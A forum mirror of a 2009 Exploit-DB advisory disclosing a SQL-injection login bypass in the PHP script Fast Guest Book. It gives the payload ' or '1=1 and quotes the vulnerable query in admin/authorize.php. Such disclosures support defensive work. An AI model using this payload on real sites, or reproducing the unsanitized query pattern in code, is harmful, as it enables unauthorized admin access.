- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 7719
- Проверка EDB
-
- Пройдено
- Автор
- MOUDI
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- null
- Дата публикации
- 2009-01-11
Код:
###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################
==============================================================================
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
==============================================================================
==============================================================================
Fast Guest Book (Auth Bypass) SQL Injection Vulnerability
==============================================================================
[»] Script: [ Fast Guest Book ]
[»] Language: [ PHP ]
[»] Website: [ http://fastcreators.com/products/guestbook/download.php ]
[»] Founder: [ Moudi <[email protected]> ]
[»] Thanks to: [ MiZoZ , ZuKa , str0ke , and all hackers... ]
[»] Team: [ EvilWay ]
###########################################################################
===[ Exploit ]===
[»] ' or '1=1
===[ BUG ]===
[»] Bug In \admin\authorize.php
$query = "select * from admin where userid='{$_POST['uname']}' AND
pass='{$_POST['pass']}'";
Author: Moudi
###########################################################################
# milw0rm.com [2009-01-11]
- Источник
- www.exploit-db.com